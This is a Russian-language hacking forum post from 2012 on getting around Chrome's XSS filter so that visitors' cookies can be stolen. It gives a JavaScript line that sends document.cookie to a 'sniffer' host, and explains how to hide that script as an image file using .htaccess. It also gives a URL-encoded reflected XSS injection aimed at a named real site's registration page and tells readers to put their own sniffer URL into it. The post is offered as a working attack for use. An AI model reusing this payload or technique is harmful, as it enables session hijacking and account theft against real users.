31.01.2012, 01:00
|
|
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами:
8553206
Репутация:
5
|
|
Обход Chrome
и так вместо прямой ссылки на снифер http://s.gif делаем в картинке ядовитый код например
img = new Image(); img.src = "http://s.gif?"+document.cookie;
это мы скрываем расширение .js
и открываем на хосте файлом .htaccess нашу картинку и кукисы наши ,таким образом мы обошли фильтр в хроме
пример:
PHP highlight
Код:
Код:
http://w4.dwar.mail.ru/register.php?referrer=%22%3E%3Cmarquee%20behavior=%22scroll%22%20direction=%22left%22%3E%3Cdiv%20style=%22text-align:center;%22%3E%3Cimg%20src=%22http://www.htmlcodes.me/images/marquees/flying_bat.gif%22%20width=%22125%22%20height=%2282%22%20alt=%22Flying%20bat%20in%20a%20marquee%22%20/%3E%3Cbr%20/%3EBruce%20the%20Bat%3C/div%3E%3C/marquee%3E%3Cp%3E%3Ca%20style=%22font-size:11px;color:#999;" href="http://www.html.am/html-editors/online-html-editor.cfm">HTML editor0height="82"%20alt="Flying%20bat%20in%20a%20marquee"%20/>Bruce%20the%20BatHTML editorrquee>marquee>
теперь осталось поменять урл http://www.htmlcodes.me/images/marquees/flying_bat.gif <--- на наш который будет в картинке ,если Вы оставите расширение .jsто куки не придут ,если дадите прямую ссылку на снифер то на снифер придет только адрес оттуда откуда Вы запустили яд.
|
|
|